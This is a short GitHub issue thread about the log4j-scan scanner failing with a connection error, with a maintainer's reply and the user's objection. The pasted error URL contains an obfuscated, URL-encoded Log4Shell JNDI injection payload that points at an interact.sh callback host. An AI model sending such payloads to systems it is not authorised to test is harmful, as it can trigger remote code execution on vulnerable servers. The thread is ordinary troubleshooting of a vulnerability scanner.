### ISSUE TITLE
EXCEPTION: HTTPConnectionPool

### ISSUE THREAD

**Issue by vansh1** [fullhunt/log4j-scan#101]
EXCEPTION: HTTPConnectionPool(host='subdomain.target.com', port=80): Max retries exceeded with url: /?v=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Fchat1.indiamart.com.e15k45j9m8164k91k1i9477h821c680ve.interact.sh%2Fs2lowg2%7D (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0x7f2a00d59fd0>: Failed to establish a new connection: [Errno -3] Temporary failure in name resolution'))

**Comment by mazen160** [comment]
It seems that you're not able to connect that host, or maybe their WAF is blocking your request.

**Comment by vansh1** [comment]
it's not possible that every domain us blocking your requests
